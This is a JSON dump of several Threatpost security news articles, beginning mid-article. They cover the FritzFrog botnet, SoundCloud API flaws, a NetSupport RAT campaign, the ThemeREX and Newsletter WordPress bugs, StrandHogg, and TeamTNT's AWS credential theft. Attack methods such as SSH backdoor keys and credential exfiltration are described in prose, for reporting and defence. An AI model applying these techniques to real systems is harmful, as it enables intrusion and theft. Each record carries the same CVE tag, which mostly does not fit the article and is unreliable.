Once this initial syncing is finished, FritzFrog gets creative on the evasion-detection front when it comes to further communication from outside the botnet: \u201cInstead of sending commands directly over port 1234, the attacker connects to the victim over SSH and runs a netcat client on the victim\u2019s machine,\u201d according to the analysis. \u201cFrom this point on, any command sent over SSH will be used as netcat\u2019s input, thus transmitted to the malware.\u201d\n\nMeanwhile, the botnet constantly updates itself with databases of targets and breached machines as it worms through the internet.\n\n\u201cNodes in the FritzFrog network keep in close contact with each other,\u201d Harpaz noted. \u201cThey constantly ping each other to verify connectivity, exchange peers and targets and keep each other synced. The nodes participate in a clever vote-casting process, which appears to affect the distribution of brute-force targets across the network. Guardicore Labs observed that targets are evenly distributed, such that no two nodes in the network attempt to \u2018crack\u2019 the same target machine.\u201d\n\nFurther, it was built with an extensive dictionary of breached names and passwords for brute-forcing purposes, making it highly aggressive (\u201cBy comparison, DDG, a recently discovered P2P botnet, used only the username \u2018root,'\u201d said Harpaz).\n\nThe malware also spawns multiple threads to perform various tasks simultaneously. For instance, an IP address in the target queue will be fed to a Cracker module, which in turn will scan the machine attached to the IP address and try to brute-force it; a machine which was successfully breached is queued for malware infection by the DeployMgmt module; and a machine which was successfully infected will be added to the P2P network by the Owned module.\n\nIn the event of a reboot of the compromised system, the malware leaves a backdoor behind, whose login credentials are saved by the network peers.\n\n\u201cThe malware adds a public SSH-RSA key to the authorized_keys file,\u201d according to the research. \u201cThis simple backdoor allows the attackers \u2013 who own the secret private key \u2013 for passwordless authentication, in case the original password was modified.\u201d\n\nThe malware also monitors the file system state on infected machines, periodically checking for available RAM, uptime, SSH logins and CPU-usage statistics. Other nodes take this information and uses it to determine whether to run a cryptominer or not.\n\nIf it decides to run a cryptominer, the malware runs a separate process called \u201clibexec\u201d to mine the Monero cryptocurrency with an XMRig spinoff. Though this secondary infection is what the botnet has so far been used for, its architecture means that it could also install any other type of malware on infected nodes, should its authors decide to do so.\n\nIn all, FritzFrog is highly advanced, Harpaz said, but there\u2019s a simple way to ward off a compromise: \u201cWeak passwords are the immediate enabler of FritzFrog\u2019s attacks,\u201d she said. \u201cWe recommend choosing strong passwords and using public key authentication, which is much safer.\u201d\n\nAdmins should also remove FritzFrog\u2019s public key from the authorized_keys file, preventing the attackers from accessing the machine, she said. And, \u201crouters and IoT devices often expose SSH and are thus vulnerable to FritzFrog; consider changing their SSH port or completely disabling SSH access to them if the service is not in use.\u201d\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-19T20:46:31", "type": "threatpost", "title": "FritzFrog Botnet Attacks Millions of SSH Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-19T20:46:31", "id": "THREATPOST:639CADC540E81321048EB418C2EC7586", "href": "https://threatpost.com/fritzfrog-botnet-millions-ssh-servers/158489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:30:31", "description": "Online music platform SoundCloud, which can be thought of as an audio-based YouTube for music creators, has addressed several security bugs in its APIs that could lead to denial-of-service (DoS) or account takeover via credential-stuffing.\n\nSoundCloud recently [sold a $75 million stake](<https://techcrunch.com/2020/02/11/music-streaming-pioneer-soundcloud-raises-75m-from-pandora-owner-siriusxm/>) to satellite radio giant SiriusXM and the two also inked a lucrative ad deal. SoundCloud claims to host 200 million different music tracks on its online platform.\n\nAccording to researcher Paulo Silva of Checkmarx Security Research, three different groups of security vulnerabilities were found in the platform: A authentication issue which could lead to account takeover; a rate-limiting bug that could lead to DoS; and an improper input validation.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe broken authentication issue has to do with not having a set number of login tries before locking someone out of the account \u2013 which opens the door to unlimited brute-force attacks from cybercriminals trying to guess passwords.\n\n\u201cThe /sign-in/password endpoint of api-v2.soundcloud.com does not implement proper account lockout based on failed authentication attempts,\u201d according to Silva, in [an analysis](<https://www.checkmarx.com/blog/checkmarx-research-soundcloud-api-security-advisory>) posted Tuesday. \u201cIt solely relies on rate limiting which can be evaded using several combinations of use_agent, device_id and signature.\u201d\n\nThat means that credential stuffing \u2014 the automated process of verifying that breached pairs of usernames and passwords work for not only the services that they originated from, but also other services \u2014 could have become a real issue. Digital Shadows [recently pointed out](<https://threatpost.com/password-breaches-fueling-booming-credential-stuffing-business/125900/>) that the market for credential stuffing software and services is thriving thanks in large part to an epidemic of breaches of usernames and passwords.\n\nCheckmarx also found a related user enumeration weakness that could be used to verify valid user account IDs as well, making it even easier to hack accounts. An attacker can exploit this to guess account names and then probe whether or not they actually exist.\n\n\u201cBoth /sign-in/identifier and /users/password_reset endpoints of api-v2.soundcloud.com can be used to enumerate user accounts,\u201d explained the firm. \u201cIn both cases, the endpoints provide different responses depending on whether the requested user account identifier exists or not.\u201d\n\nThe rate-limiting issue meanwhile has to do with SoundCloud not limiting how many song results can be retrieved in certain searchers.\n\nFor instance, the /me/play-history/tracks API endpoint, which allows users to view recently played songs, doesn\u2019t enforce rate limiting. Thus, an attacker can send a large number of POST requests from a single machine/IP address, or can use a high-volume GET request to return hundreds of tracks at once. This can not only potentially overwhelm the API if several of these are sent at the same time, but it could also be used to artificially inflate the statistics for demand for certain tracks or artists.\n\n\u201cThe lack of rate limiting may compromise the system availability, making it vulnerable to DoS attacks,\u201d according to Checkmarx. \u201cFrom a business perspective, not limiting the amount of requests to this endpoint may compromise the data integrity, since it may create biased tracks-statistics.\u201d\n\nA related issue has to do with the /tracks endpoint of api-v2.soundcloud.com, which Silva said does not implement proper resources limiting \u2013 also potentially leading to DoS.\n\n\u201cSince no validation is performed regarding the number of tracks IDs in the ids list, it is possible to manipulate the list to retrieve an arbitrary number of tracks in a single request,\u201d he said, adding that in testing, researchers were able to retrieve up to 689 tracks in a single request.\n\n\u201cUsing a specially crafted list of track IDs to maximize the response size, and issuing requests from several sources at the same time to deplete resources in the application layer, will make the target\u2019s system services unavailable,\u201d Silva explained.\n\nThe improper input validation issue meanwhile would allow the attacker to use extra-long character strings when filling in the description, title and genre forms while uploading songs, according to the research. An exploit could make use of this to carry out cross-site scripting attacks or SQL injection.\n\n\u201cThe /tracks/{track_urn} endpoint of api-v2.soundcloud.com does not properly validate and enforce the length of [these] properties,\u201d Silva explained. \u201cIssuing requests directly to the API server puts the attacker in control of an additional 61960 bytes (total of 66160 bytes).\u201d\n\nFor its part, SoundCloud promptly fixed the problem and sent out a statement: \u201cAt SoundCloud, the security of our users\u2019 accounts is extremely important to us. We are always looking for ways to enhance the security of our platform for our users. We appreciate Checkmarx reaching out to discuss their findings.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "cvss3": {}, "published": "2020-02-12T18:48:59", "type": "threatpost", "title": "SoundCloud Tackles DoS, Account Takeover Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-12T18:48:59", "id": "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "href": "https://threatpost.com/soundcloud-dos-account-takeover/152838/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:28:08", "description": "The legitimate remote access tool (RAT) called NetSupport Manager, used for troubleshooting and tech support, is being converted into a malicious weapon by cybercriminals. Researchers at Palo Alto Networks\u2019 Unit 42 division have spotted a spam campaign attempting to deliver a malicious Microsoft Word document that uses the disguise of a NortonLifeLock-protected file.\n\nNortonLifeLock is a security utility for password-protecting attachments, among other things. If a recipient opens the document via Microsoft Office Outlook, a prompt appears that asks users to \u201cenable content\u201d to open the document \u2013 clicking \u201cyes\u201d executes macros.\n\n\u201cTo the user, the document appears to contain personal information that requires a password to view,\u201d said researchers, in a [recent analysis](<https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/>). \u201cOnce the document is opened and the user clicks \u2018Enable Content,\u2019 the macro is executed and the user is presented with a password dialog box.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers added that the password is likely provided in the body of the phishing email, because it has to be correct; no malicious activity occurs until the correct key is entered. Once the key is accepted, the macros create and execute a batch file called alpaca.bat.\n\n\u201cThe macro obfuscates all strings using multiple labels on Visual Basic for Applications (VBA) forms, which contain two characters that are eventually linked together to construct the final command to download and execute the RAT on the victim,\u201d according to Unit 42. \u201cThe command string is executed via the VBA shell function, which [creates and executes alpaca.bat].\u201d\n\nThe campaign uses a range of tactics to obfuscate its activity from both dynamic and static analysis, according to researchers. For instance, the batch script uses msiexec, which is a legitimate part of the Windows Installer service. It\u2019s used to download and install a Microsoft Intermediate Language (MSIL) binary from a legitimate domain, which has been compromised. Once downloaded, the binary will execute using the /q parameter to suppress any Windows dialogs from the user.\n\nThe campaign also uses the PowerShell PowerSploit framework to carry out the installation of the malicious file activity. The MSI installs a PowerShell script in the victim\u2019s %temp% directory named REgistryMPZMZQYVXO.ps1. This contains another PowerShell script that is responsible for installing the NetSupport Manager RAT onto the victim\u2019s machine.\n\n\u201cThe PowerShell script appears to have been generated using the open-source script Out-EncryptedScript.ps1 from the PowerSploit framework,\u201d according to the analysis. \u201cIt contains a blob of data that is obfuscated via base64 and is TripleDES encrypted with a cipher mode of Cipher Block Chain (CBC).\u201d\n\nThe RAT installer PowerShell script interestingly aborts installation if Avast or AVG Antivirus Software is running on the target machine. If not, it installs 12 files that make up the NetSupport Manager RAT to a random directory and sets up persistence by creating the following registry key: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\n\n\u201cOnce the main NetSupport Manager executable (presentationhost.exe) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP POST,\u201d the researchers wrote.\n\nResearchers said that the campaign is likely part of a larger offensive that dates back to early November, with email subject lines reusing themes associated with refunds, as well as transaction and order inquiries. The attached documents contain the target company\u2019s name.\n\n\u201cMalicious use of the NetSupport Manager remote access tool has also been reported by both [FireEye ](<https://www.fireeye.com/blog/threat-research/2018/04/fake-software-update-abuses-netsupport-remote-access-tool.html>)and [Zscaler ](<https://www.zscaler.com/blogs/research/netsupport-rat-installed-fake-update-notices>)researchers,\u201d researchers concluded. \u201cWhile this activity appears to be broad and at large scale, there are indications, such as the document name, that show the actor\u2019s attempt to provide a stronger relationship to the target in an attempt to increase the success rate.\u201d\n", "cvss3": {}, "published": "2020-03-02T21:59:34", "type": "threatpost", "title": "NetSupport Manager RAT Spread via Bogus NortonLifeLock Docs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-02T21:59:34", "id": "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "href": "https://threatpost.com/netsupport-manager-rat-nortonlifelock-docs/153387/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:27:42", "description": "A critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day.\n\nThe plugin, which is installed on approximately 44,000 sites, is used to apply various \u201cskins\u201d that govern the look and feel of web destinations, including theme-enhancing features and widgets.\n\nTo provide compatibility with WordPress\u2019 Gutenberg plugin, the ThemeREX Addons plugin uses an API, according to Wordfence researcher Chloe Chamberland, writing in [a blog posting](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) on Monday. When the API interacts with Gutenberg, the touchpoints of that communication are known as endpoints. ThemeREX uses the \u201c~/includes/plugin.rest-api.php\u201d file to register an endpoint (\u201c/trx_addons/v2/get/sc_layout\u201d), which in turn calls the \u201ctrx_addons_rest_get_sc_layout\u201d function.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis introduces an access-control problem, the researcher noted. In unpatched versions of ThemeREX, \u201cthere were no capability checks on this endpoint that would block users that were not administrators or currently signed in, so any user had the ability to call the endpoint regardless of capability,\u201d she explained. \u201cIn addition, there was no nonce check to verify the authenticity of the source.\u201d\n\nFurther down in the code, there\u2019s also a functionality used to get parameters from widgets that work with the Gutenberg plugin.\n\n\u201cThis is where the core of the remote code execution vulnerability was present,\u201d Chamberland wrote. \u201cThere were no restrictions on the PHP functions that could be used or the parameters that were provided as input. Instead, we see a simple if (function_exists($sc)) allowing for any PHP function to be called and executed.\u201d\n\nThe upshot of this is that adversaries can use various WordPress functions \u2013 for instance, in attacks in the wild, the \u201cwp_insert_user\u201d function was used to create administrative user accounts and take over sites, according to the research.\n\nThemeREX has now addressed the issue by completely removing the affected ~/plugin.rest-api.php file from the plugin \u2013 users should update to the latest version to stay protected.\n\nWordPress plugins continue to be a rich avenue of attack for cybercriminals. Last month, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked.\n\nAnd, earlier in February a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-10T20:30:36", "type": "threatpost", "title": "Popular ThemeREX WordPress Plugin Opens Websites to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-10T20:30:36", "id": "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "href": "https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:09", "description": "Researchers have discovered a new Android vulnerability that could allow malware to pose as popular apps and ask for various permissions, potentially allowing hackers to listen in on users, take photos, read and send SMS messages, and basically take over various functions as if they are the device\u2019s owner.\n\nSecurity researchers John H\u00f8egh-Omdal, Caner Kaya and Markus Ottensmann at Norwegian app-security provider [Promon](<https://promon.co/>) discovered the flaw\u2014which they dubbed \u201cStrandHogg\u201d from old Norse for the Viking tactic of plundering villages and holding people for ransom. They said attackers can use the vulnerability to allow \u201creal-life malware to pose as legitimate apps, with users unaware they are being targeted,\u201d according to a [blog post](<https://promon.co/security-news/strandhogg/>).\n\n\u201cThe attack can be designed to request permissions which would be natural for different targeted apps to request, in turn lowering suspicion from victims,\u201d researchers wrote. \u201cUsers are unaware that they are giving permission to the hacker and not the authentic app they believe they are using.\u201d[](<https://threatpost.com/newsletter-sign/>)\n\nIf the flaw is exploited, to users it appears that they are clicking on an app that they use every day, such as Facebook or Instagram. However, what happens when they click on the app is that instead of the app a user intended to open starting up, malware is deployed that can give permissions to the hacker, who is directed to the legitimate app, researchers said.\n\nThe flaw, which can be exploited by \u201creal-life malware,\u201d affects all Android devices, including those running Android 10, they said, as well as puts the top 500 most popular apps at risk.\n\nResearchers from Promon partner Lookout already have identified 36 malicious apps exploiting the vulnerability, which can be done without gaining root access to the device, according to the post. Among those apps were variants of the BankBot Trojan\u2014widespread malware that\u2019s been detected all over the world\u2013observed as early as 2017, researchers said.\n\nMoreover, the persistent problem of malware slipping under the radar on Google Play is what appears to be responsible for the spread of malicious code that exploits the flaw, researchers said. While the specific malware sample that Promon researchers analyzed did not reside on the app store, it was installed through several dropper apps/hostile downloaders distributed on Google Play, they said.\n\nWhile these apps have since been removed, dropper apps continue to be published in spite of protections that exist on the store, researchers said. In fact, some are being downloaded millions of times before being spotted and deleted, they said.\n\nIndeed, Google has [struggled mightily](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>) with malware [making its way onto Google Play](<https://threatpost.com/google-play-malicious-apps-racked-up-335m-installs-in-september/148810/>) under its watch and recently has taken [new steps](<https://threatpost.com/google-bad-android-apps/149981/>) to try to alleviate this problem. The discovery of StrandHogg appears to make the need for better security for Android mobile apps all that more urgent.\n\nIndeed, the existence of the vulnerability already being exploited in the wild certainly is troubling, as it means users already likely have been compromised and remain at critical risk, observed Sam Bakken, senior product marketing manager, for digital identity and anti-fraud solution provider [OneSpan](<https://www.onespan.com/>).\n\n\u201cAs you might imagine, criminals salivate over the monetization potential in stolen mobile banking credentials and access to one-time-passwords sent via SMS,\u201d he said in an e-mail to Threatpost. \u201cPromon\u2019s recent findings make the vulnerability as severe as it\u2019s ever been.\u201d\n\nThere is some good news in all of this, Bakken said. Security solutions do exist \u201cunder the umbrella of in-app protection\u201d that can protect devices from malware exploiting StrandHogg, including \u201capp shielding and runtime protection [that] make it easier for app developers to mitigate these windows of exposure resulting from security issues in both Android and iOS,\u201d he said.\n\n**[Free Threatpost Webinar:](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)** _**Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. [Join us on Dec. 18th at 2 pm EST](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. [Click here to register](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>).**_\n", "cvss3": {}, "published": "2019-12-03T13:26:14", "type": "threatpost", "title": "\u2018StrandHogg\u2019 Vulnerability Allows Malware to Pose as Legitimate Android Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-12-03T13:26:14", "id": "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "href": "https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:43", "description": "Mozilla is bumping up its bug bounty payouts and has added new websites and services \u2013 including the recently deployed [Firefox Monitor](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>)\u2013 to its bug bounty program in hopes of attracting more researchers to sniff out vulnerabilities.\n\nThe browser-maker is doubling bug bounty payouts for most of its in-scope sites and services, as well as tripling payouts for the highest bug classification in its program, remote code execution vulnerabilities. Researchers can now [bring in $15,000](<https://www.mozilla.org/en-US/security/web-bug-bounty/>) for RCE flaws on \u201ccritical websites\u201d (sites and services considered critical to Mozilla operations, which pay out at the highest bounty rate) and $5,000 for \u201ccore websites\u201d (which pay out bounties, but at a reduced rate).\n\n\u201cMozilla was one of the first companies to establish a bug bounty program and we continually adjust it so that it stays as relevant now as it always has been,\u201d said Simon Bennetts with Mozilla [in a Tuesday announcement](<https://blog.mozilla.org/security/2019/11/19/updates-to-the-mozilla-web-security-bounty-program/>). \u201cTo celebrate the 15 years of the 1.0 release of Firefox, we are making significant enhancements to the web bug bounty program.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn addition, Mozilla announced that over the past six months, it has added new in-scope \u201ccritical websites\u201d and services for its program. This includes:\n\n * [Autograph](<https://github.com/mozilla-services/autograph>) \u2013 a cryptographic signature service that signs Mozilla products.\n * [Lando](<https://moz-conduit.readthedocs.io/en/latest/lando-user.html>) \u2013 Mozilla\u2019s automatic code-landing service which allows users to commit Phabricator revisions to their destination repository.\n * [Phabricator](<https://wiki.mozilla.org/Phabricator>) \u2013 a code management tool used for reviewing Firefox code changes.\n * [Taskcluster](<https://docs.taskcluster.net/docs>) the task execution framework that supports Mozilla\u2019s continuous integration and release processes.\n\nMozilla has also offered new Core sites to its program \u2013 including Firefox Monitor, a site where users can register their email address so that they can be informed if their account details are part of a data breach. Firefox Monitor, which made waves after it was announced in 2018 on the heels of Mozilla\u2019s partnership with Cloudflare and Have I Been Pwned (HIBP), went into [testing earlier this year](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>) and has since been released.\n\nOther added \u201ccore\u201d websites that are now in-scope include:\n\n * [Localization](<https://mozilla-l10n.github.io/localizer-documentation/>) \u2013 a service contributors can use to help localize Mozilla products.\n * [Payment Subscription](<https://github.com/mozilla/subhub>) \u2013 a service that is used as the interface in front of the payment provide (Stripe).\n * [Firefox Private Network](<https://private-network.firefox.com/>) \u2013 a site from which users can download a desktop extension that helps secure and protect connections everywhere Firefox is used.\n * [Ship It](<https://wiki.mozilla.org/ReleaseEngineering/Applications/Ship_It>) \u2013 a system that accepts requests for releases from humans and translates them into information and requests that Mozilla\u2019s Buildbot-based release automation can process.\n * [Speak To Me](<https://github.com/mozilla/speech-proxy>) \u2013 Mozilla\u2019s Speech Recognition API.\n\nMozilla has continually increased rewards for bug bounty vulnerabilities over the years \u2013 the last time [being in 2015](<https://threatpost.com/mozilla-bug-bounty-payouts-going-up/113264/>). Mozilla started its [web bounty program](<https://threatpost.com/behind-numbers-mozillas-bug-bounty-program-092811/75701/>) in December 2010 and offered rewards of up to $3,000 for certain kinds of vulnerabilities reported in those sites.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2019-11-20T21:04:32", "type": "threatpost", "title": "Mozilla Bug Bounty Program Doubles Payouts, Adds Firefox Monitor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-11-20T21:04:32", "id": "THREATPOST:BED35CFCFED307909DB60602551982A6", "href": "https://threatpost.com/mozilla-bug-bounty-program-doubles-payouts-adds-firefox-monitor/150489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:12", "description": "A cryptomining worm from the group known as TeamTNT is spreading through the Amazon Web Services (AWS) cloud and collecting credentials. Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n\nAccording to researchers at Cado Security, the worm also deploys a number of openly available malware and offensive security tools, including \u201cpunk.py,\u201d a SSH post-exploitation tool; a log cleaning tool; the Diamorphine rootkit; and the Tsunami IRC backdoor.\n\nIt is, they said, the first threat observed in the wild that specifically targets AWS for cryptojacking purposes. However, it also carries out more familiar fare.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe worm also steals local credentials, and scans the internet for misconfigured Docker platforms,\u201d according to a [Monday posting](<https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/>). \u201cWe have seen the attackers\u2026compromise a number of Docker and Kubernetes systems.\u201d\n\nAs more businesses embrace cloud and container environments, it has opened up a new attack surface for cybercriminals via misconfiguration. That said, cryptomining threats taking aim at Docker and Kubernetes aren\u2019t new. Attackers continue to scan for [publicly accessible, open Docker/Kubernetes servers](<https://threatpost.com/docker-registries-malware-data-theft/152734/>) in an automated fashion, and then exploit them in order to set up their own containers and execute malware on the victim\u2019s infrastructure.\n\nUsually that malware is a cryptominer of some kind, [as seen in April](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) in a Bitcoin-mining campaign using the Kinsing malware. Sometimes the threat is more evolved, as seen in July, when a fresh [Linux backdoor called Doki](<https://threatpost.com/icedid-trojan-rebooted-evasive-tactics/158425/>) was seen infesting Docker servers to sett the scene for any number of malware-based attacks, from denial-of-service/sabotage to information exfiltration to ransomware.\n\nHowever, the focus on AWS in this latest set of campaigns \u2013 which [were also flagged](<https://twitter.com/malwrhunterteam/status/1256664761997148161>) by MalwareHunterTeam \u2013 is unique, Cado researchers said.\n\n## **Attacking AWS**\n\nThe attack starts with targeting the way that AWS stores credentials in an unencrypted file at ~/.aws/credentials, and additional configuration details in a file at ~/.aws/config.\n\n\u201cThe code to steal AWS credentials is relatively straightforward \u2013 on execution it uploads the default AWS credentials and config files to the attackers\u2019 server, sayhi.bplace[.]net,\u201d researchers explained. \u201cCurl is used to send the AWS credentials to TeamTNT\u2019s server.\u201d\n\nInterestingly, though the script is written to be a worm, the automated portion of the attack didn\u2019t seem to be in full operation during the security firm\u2019s analysis.\n\n\u201cWe sent credentials created by CanaryTokens.org to TeamTNT, however have not seen them in use yet,\u201d according to the post. \u201cThis indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn\u2019t currently functioning.\u201d\n\nThe script that anchors TeamTNT\u2019s worm is repurposed code from the aforementioned Kinsing malware, researchers said, which was originally used to scan for misconfigured Docker APIs, then spin up Docker images and install itself. They added that copying code from other tools is common in this area of cybercrime.\n\n\u201cIn turn, it is likely we will see other worms start to copy the ability to steal AWS credentials files too,\u201d they said. \u201cWhilst these attacks aren\u2019t particularly sophisticated, the numerous groups out there deploying cryptojacking worms are successful at infecting large amounts of business systems.\u201d\n\n## **TeamTNT \u2013 It\u2019s Dynamite**\n\nAs far as attribution, TeamTNT announces itself in numerous references within the worm\u2019s code, according to researchers, plus the group uses a domain called teamtnt[.]red. That domain hosts malware, and the homepage is entitled \u201cTeamTNT RedTeamPentesting.\u201d\n\nTeamTNT has been prolific, and was spotted originally earlier in the year. In April, Trend Micro [observed](<https://www.trendmicro.com/vinfo/hk-en/security/news/virtualization-and-cloud/coinminer-ddos-bot-attack-docker-daemon-ports>) the group attacking Docker containers.\n\nAn examination by Cado of one of the mining pools yielding information about the systems that the AWS-capable worm has compromised showed that for the one pool, there were 119 compromised systems, across AWS, Kubernetes clusters and Jenkins build servers.\n\n\u201cSo far we have seen two different Monero wallets associated with these latest attacks, which have earned TeamTNT about three XMR,\u201d researchers explained. \u201cThat equates to only about $300, however this is only one of their many campaigns.\u201d\n\nCado researchers suggested that to thwart such attacks, businesses should identify which systems are storing AWS credential files and delete them if they aren\u2019t needed. Also, review network traffic for any connections to mining pools or those sending the AWS credentials file over HTTP; and, use firewall rules to limit any access to Docker APIs.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-18T14:14:12", "type": "threatpost", "title": "AWS Cryptojacking Worm Spreads Through the Cloud", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-18T14:14:12", "id": "THREATPOST:0A238D67F7286BA41103801846210F7A", "href": "https://threatpost.com/aws-cryptojacking-worm-cloud/158427/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:46", "description": "Newsletter, a WordPress plugin with more than 300,000 installations, has a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nThe Newsletter plugin offers site admins a visual editor that can be used to create newsletters and email campaigns from within WordPress. According to Wordfence, the issues are a reflected cross-site scripting (XSS) vulnerability and a PHP object-injection vulnerability, both of which can be rectified by updating to the latest version of Newsletter, v.6.8.2.\n\nThe first bug is an authenticated reflected XSS problem (CVE pending), which is a medium-severity issue ranking 6.5 on the CvSS scale. Successful exploitation could allow logged-in attackers to inject malicious code into a web window.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cDespite the fact that [this type of bug] requires an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users,\u201d according to Wordfence. \u201cIf an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim\u2019s browser.\u201d\n\nAccording to Wordfence, the specific issue arises because vulnerable versions of Newsletter use an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. However these options aren\u2019t filtered, but are instead passed directly on to a second function, restore_options_from_request, which displays the blocks using the render_block function, according to [the analysis](<https://www.wordfence.com/blog/2020/08/newsletter-plugin-vulnerabilities-affect-over-300000-sites/>), released Monday.\n\n\u201cAs 